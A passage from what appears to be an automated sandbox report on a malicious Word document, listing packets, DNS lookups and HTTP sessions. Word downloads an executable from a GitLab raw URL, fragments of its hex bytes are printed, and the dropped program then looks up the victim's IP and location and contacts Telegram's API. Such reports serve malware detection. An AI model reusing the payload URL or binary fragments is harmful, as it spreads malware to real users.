                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.668658018 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.668709993 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.668742895 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.668776989 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.668782949 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.668817997 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.668987989 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669225931 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669253111 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669286966 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669296026 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669317007 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669333935 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669559956 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669589996 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669625044 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669631004 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669655085 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.669672012 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.734935045 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.734962940 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.735034943 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.735058069 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.735091925 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.735100985 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.738571882 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.738595963 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.738671064 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.738679886 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.738766909 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741005898 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741028070 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741077900 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741095066 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741112947 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741120100 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741166115 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741172075 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741199970 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.741236925 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756211996 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756241083 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756290913 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756311893 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756330967 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756371021 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756398916 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756637096 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756654978 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756711006 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756717920 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756890059 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756906986 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756926060 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756973028 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:52.756978989 CET44349713172.65.251.78192.168.2.10

                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Jan 14, 2025 15:43:48.941797972 CET192.168.2.101.1.1.10x5387Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jan 14, 2025 15:47:11.140986919 CET192.168.2.101.1.1.10xab4fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jan 14, 2025 15:47:12.784666061 CET192.168.2.101.1.1.10x37f6Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jan 14, 2025 15:47:14.922887087 CET192.168.2.101.1.1.10x1098Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Jan 14, 2025 15:43:48.948504925 CET1.1.1.1192.168.2.100x5387No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jan 14, 2025 15:47:11.147602081 CET1.1.1.1192.168.2.100xab4fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jan 14, 2025 15:47:11.147602081 CET1.1.1.1192.168.2.100xab4fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jan 14, 2025 15:47:11.147602081 CET1.1.1.1192.168.2.100xab4fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jan 14, 2025 15:47:12.791595936 CET1.1.1.1192.168.2.100x37f6No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jan 14, 2025 15:47:14.930176020 CET1.1.1.1192.168.2.100x1098No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.1049735208.95.112.1808044C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jan 14, 2025 15:47:12.797868013 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Jan 14, 2025 15:47:13.252995014 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 14:47:12 GMT
                                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 306
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 60
                                                                                                                                                                                                                                X-Rl: 44
                                                                                                                                                                                                                                Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}
                                                                                                                                                                                                                                Jan 14, 2025 15:47:14.488887072 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Jan 14, 2025 15:47:14.589056969 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 14:47:13 GMT
                                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 306
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 58
                                                                                                                                                                                                                                X-Rl: 43
                                                                                                                                                                                                                                Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.1049713172.65.251.784434560C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC327OUTGET /app8490744/updatesa/-/raw/main/up HTTP/1.1
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Accept-Language: en-ch
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                Host: gitlab.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 14:43:49 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 78347968
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Ray: 901e668a6f201871-EWR
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Age: 10
                                                                                                                                                                                                                                Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                                Content-Disposition: inline
                                                                                                                                                                                                                                ETag: "10f836507cd97c5afcfd16e3634fea62"
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                                Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC514INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 33 42 25 32 42 25 32 42 49 6b 75 37 4a 4d 6c 58 76 6b 4b 4d 6a 5a 56 75 57 51 63 58 55 49 59 31 33 5a 47 25 32 42 57 38 75 72 68 49 25 32 42 32 48 53 49 25 32 46 71 50 58 66 35 4b 51 6e 39 30 74 69 75 56 74 36 50 42 36 4c 35 49 25 32 42 74 4f 61 38 34 58 46 32 54 43 70 64 72 7a 71 32 65 25 32 46 70 25 32 46 55 42 35 52 39 32 76 32 37 50 74 75 4a 62 38 74 76 62 25 32 46 45 36 52 37 43 55 34 66 39 47 38 25 32 42 77 62 6f 35 4d 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3B%2B%2BIku7JMlXvkKMjZVuWQcXUIY13ZG%2BW8urhI%2B2HSI%2FqPXf5KQn90tiuVt6PB6L5I%2BtOa84XF2TCpdrzq2e%2Fp%2FUB5R92v27PtuJb8tvb%2FE6R7CU4f9G8%2Bwbo5M%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC1369INData Raw: 34 64 35 61 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 66 66 66 66 30 30 30 30 62 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 65 31 66 62 61 30 65 30 30 62 34 30 39 63 64 32 31 62 38 30 31 34 63 63 64 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 66 36 37 37 32 36 31 36 64 32 30 36 33 36 31 36 65 36 65 36 66 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 65 32 30 36 39 36 65 32 30 34 34 34 66 35 33 32 30 36 64 36 66 36 34 36 35 32 65 30 64 30 64 30 61 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                                                                                                                                Data Ascii: 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a240000000000000
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC1369INData Raw: 34 36 31 30 30 30 30 66 63 36 30 30 33 30 30 30 30 61 30 37 62 30 30 30 30 36 32 30 33 30 30 30 30 30 63 37 61 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 34 30 32 65 36 34 36 39 36 34 36 31 37 34 30 30 30 30 33 38 30 30 30 30 30 30 30 30 31 30 37 66 30 30 30 30 30 32 30 30 30 30 30 30 36 65 37 64 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 63 30 35 33 36 35 36 33 37 34 36 39 36 66 36 65 30 30 30 38 30 30 30 30 30 30 30 30 32 30 37 66 30 30 30 30 30 32 30 30 30 30 30 30 37 30 37 64 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 63 30 35 66 35 32 34 34 34 31 35 34 34 31 30 30 30 30 30 38 33 32 30 31 30 30
                                                                                                                                                                                                                                Data Ascii: 4610000fc60030000a07b0000620300000c7a00000000000000000000000000400000402e646964617400003800000000107f0000020000006e7d00000000000000000000000000400000c053656374696f6e000800000000207f000002000000707d00000000000000000000000000400000c05f5244415441000008320100
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC1369INData Raw: 65 39 35 63 30 30 63 63 63 63 63 63 63 63 34 38 38 33 65 63 32 38 66 32 30 66 31 30 30 35 37 34 62 35 37 39 30 30 36 36 30 66 32 65 30 35 34 34 39 31 37 30 30 30 37 61 32 37 37 35 32 35 34 38 38 64 34 63 32 34 33 30 66 66 31 35 38 35 62 66 36 31 30 30 30 66 35 37 63 30 66 32 34 38 30 66 32 61 34 34 32 34 33 30 66 32 30 66 35 65 30 35 36 33 39 30 37 30 30 30 66 32 30 66 31 31 30 35 34 33 62 35 37 39 30 30 34 38 63 37 30 35 65 38 66 63 37 61 30 30 30 30 30 30 30 30 30 30 34 38 38 33 63 34 32 38 63 33 63 63 63 63 63 63 34 38 38 64 30 64 38 39 64 38 35 63 30 30 34 38 38 64 30 35 62 62 64 38 35 63 30 30 34 38 32 62 63 31 34 38 38 64 30 64 37 38 64 30 35 63 30 30 34 38 38 39 30 35 65 39 63 65 37 39 30 30 34 38 38 64 30 35 39 31 64 30 35 63 30 30 34 38 32 62 63
                                                                                                                                                                                                                                Data Ascii: e95c00cccccccc4883ec28f20f100574b57900660f2e05449170007a277525488d4c2430ff1585bf61000f57c0f2480f2a442430f20f5e0563907000f20f110543b5790048c705e8fc7a00000000004883c428c3cccccc488d0d89d85c00488d05bbd85c00482bc1488d0d78d05c00488905e9ce7900488d0591d05c00482bc
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC1369INData Raw: 38 30 39 30 39 30 39 30 39 30 36 30 31 30 31 30 63 30 39 30 63 30 63 30 37 30 37 30 37 30 37 30 37 30 63 30 63 30 63 30 63 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 39 30 63 30 61 30 61 30 61 30 61 30 61 30 62 30 62 30 61 30 61 30 61 30 61 30 61 30 61 30 61 30 62 30 62 30 61 30 61 30 62 30 62 30 39 30 63 30 63 30 63 30 39 30 63 30 63 30 31 30 39 30 63 30 63 30 62 30 62 30 62 30 62 30 31 30 63 30 63 30 63 30 31 30 63 30 63 30 32 30 33 30 31 30 30 30 61 30 61 30 61 30 61 30 63 30 62 30 63 30 61 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 31 30 63 30 38 30 38 30 38 30 38 30 38 30 63 30 63 30 39 30 39 30 39 30 63 30 39 63 63 63 63 63 63 63 63 63 63 63 63 36 35 34 38 38 62 30 34 32 35
                                                                                                                                                                                                                                Data Ascii: 8090909090601010c090c0c07070707070c0c0c0c0c070c070c070c070c070c07090c0a0a0a0a0a0b0b0a0a0a0a0a0a0a0b0b0a0a0b0b090c0c0c090c0c01090c0c0b0b0b0b010c0c0c010c0c020301000a0a0a0a0c0b0c0a0c0c0c0c0c0c0c0c0c0c0c0c0c0c010c08080808080c0c0909090c09cccccccccccc65488b0425
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC1369INData Raw: 38 33 63 34 32 30 35 66 63 33 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 38 30 37 39 30 61 30 30 34 63 38 62 63 32 37 34 31 38 34 38 38 62 30 32 34 38 38 64 39 31 35 30 30 31 30 30 30 30 34 39 38 62 63 38 34 38 38 62 34 30 31 38 34 38 66 66 32 35 66 37 63 37 36 31 30 30 63 33 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 34 38 38 39 34 63 32 34 30 38 35 33 34 38 38 33 65 63 33 30 34 38 38 62 64 39 38 30 37 39 30 61 30 30 37 34 32 30 34 63 38 62 30 31 34 38 63 37 34 34 32 34 32 30 30 30 30 30 30 30 30 30 34 63 38 62 38 39 36 38 30 31 30 30 30 30 34 35 38 62 30 30 30 66 62 37 35 31 30 38 65 38 35 65 64 32 33 30 30 30 39 30 34 38 38 64 38 33 35 30 30 31 30 30 30 30 34 38 38 39 34 34 32 34 34 38 66 36 34 30 30
                                                                                                                                                                                                                                Data Ascii: 83c4205fc3cccccccccccccccccc80790a004c8bc27418488b02488d9150010000498bc8488b401848ff25f7c76100c3cccccccccccccccccccccccccccc48894c2408534883ec30488bd980790a0074204c8b0148c7442420000000004c8b8968010000458b000fb75108e85ed2300090488d83500100004889442448f6400
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC1369INData Raw: 38 31 30 34 38 36 33 63 31 34 38 38 64 30 63 63 35 30 30 30 30 30 30 30 30 34 64 38 39 33 34 30 62 34 39 38 62 37 30 32 30 34 38 30 33 66 31 37 34 63 34 66 66 34 66 32 30 65 39 33 61 30 31 30 30 30 30 34 31 38 62 63 65 38 62 35 37 31 30 38 64 30 34 31 32 62 65 66 63 33 66 30 30 30 30 33 62 63 36 30 66 34 32 66 30 34 34 33 62 65 39 30 66 38 36 30 62 30 31 30 30 30 30 34 31 38 62 65 64 34 31 33 62 64 35 30 66 34 37 65 61 34 35 38 35 66 66 37 34 31 30 34 39 38 62 63 63 65 38 31 65 63 65 30 33 30 30 34 35 38 62 66 65 34 34 38 39 37 34 32 34 33 38 63 37 34 34 32 34 32 38 30 36 30 30 30 30 30 30 34 34 38 39 37 34 32 34 32 30 34 35 33 33 63 39 34 31 62 38 31 64 30 30 30 30 30 30 34 38 38 62 31 35 63 39 33 61 37 61 30 30 34 38 38 64 34 63 32 34 37 30 65 38 62 66
                                                                                                                                                                                                                                Data Ascii: 8104863c1488d0cc5000000004d89340b498b70204803f174c4ff4f20e93a010000418bce8b57108d0412befc3f00003bc60f42f0443be90f860b010000418bed413bd50f47ea4585ff7410498bcce81ece0300458bfe4489742438c74424280600000044897424204533c941b81d000000488b15c93a7a00488d4c2470e8bf
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC1369INData Raw: 39 30 34 38 38 64 38 62 33 30 30 33 30 30 30 30 65 38 35 38 63 65 30 30 30 30 39 30 34 38 38 64 38 62 64 38 30 33 30 30 30 30 65 38 34 62 63 65 30 30 30 30 39 30 34 38 38 64 38 33 38 38 30 34 30 30 30 30 34 38 38 39 34 34 32 34 33 38 34 38 38 39 33 38 34 38 38 39 37 38 30 38 34 38 38 39 37 38 31 30 34 38 38 39 37 38 31 38 34 38 38 39 37 38 32 30 34 38 38 39 37 38 32 38 34 38 38 39 62 62 36 38 30 32 30 30 30 30 34 38 38 39 62 62 37 38 30 32 30 30 30 30 34 38 38 62 30 64 34 32 33 33 37 61 30 30 34 38 38 62 30 31 34 38 38 62 34 30 31 30 66 66 31 35 36 64 63 32 36 31 30 30 34 38 38 39 38 33 37 30 30 32 30 30 30 30 34 38 38 39 62 62 38 30 30 32 30 30 30 30 30 66 35 37 63 30 30 66 31 31 34 33 30 38 30 66 31 31 34 33 31 38 30 66 31 31 34 33 32 38 30 66 31 31 34
                                                                                                                                                                                                                                Data Ascii: 90488d8b30030000e858ce000090488d8bd8030000e84bce000090488d8388040000488944243848893848897808488978104889781848897820488978284889bb680200004889bb78020000488b0d42337a00488b01488b4010ff156dc26100488983700200004889bb800200000f57c00f1143080f1143180f1143280f114
                                                                                                                                                                                                                                2025-01-14 14:43:49 UTC1369INData Raw: 30 30 30 30 66 35 37 63 30 30 66 31 31 30 33 30 66 31 31 34 33 31 30 30 66 31 31 34 33 32 30 30 66 31 31 34 33 33 30 38 31 34 62 32 38 30 30 30 30 30 30 34 30 34 38 38 62 63 62 66 66 31 35 62 64 62 36 36 31 30 30 38 62 34 33 32 38 32 35 30 31 30 30 30 30 63 30 30 64 30 31 30 30 30 30 38 30 38 39 34 33 32 38 63 37 34 33 33 30 30 31 30 30 30 30 30 30 63 37 34 33 33 34 30 31 30 30 30 30 30 30 38 31 38 66 30 30 30 31 30 30 30 30 30 30 30 30 30 30 34 30 34 38 38 64 38 66 64 38 30 30 30 30 30 30 66 66 31 35 38 38 62 36 36 31 30 30 38 62 38 37 30 30 30 31 30 30 30 30 32 35 30 30 30 30 30 30 63 30 30 66 62 61 65 38 31 66 38 39 38 37 30 30 30 31 30 30 30 30 38 31 38 66 33 30 30 31 30 30 30 30 30 30 30 30 30 30 34 30 34 38 38 64 38 66 30 38 30 31 30 30 30 30 66 66
                                                                                                                                                                                                                                Data Ascii: 0000f57c00f11030f1143100f1143200f114330814b2800000040488bcbff15bdb661008b432825010000c00d01000080894328c7433001000000c7433401000000818f0001000000000040488d8fd8000000ff1588b661008b870001000025000000c00fbae81f898700010000818f3001000000000040488d8f08010000ff


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.1049733104.26.13.2054438044C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2025-01-14 14:47:12 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
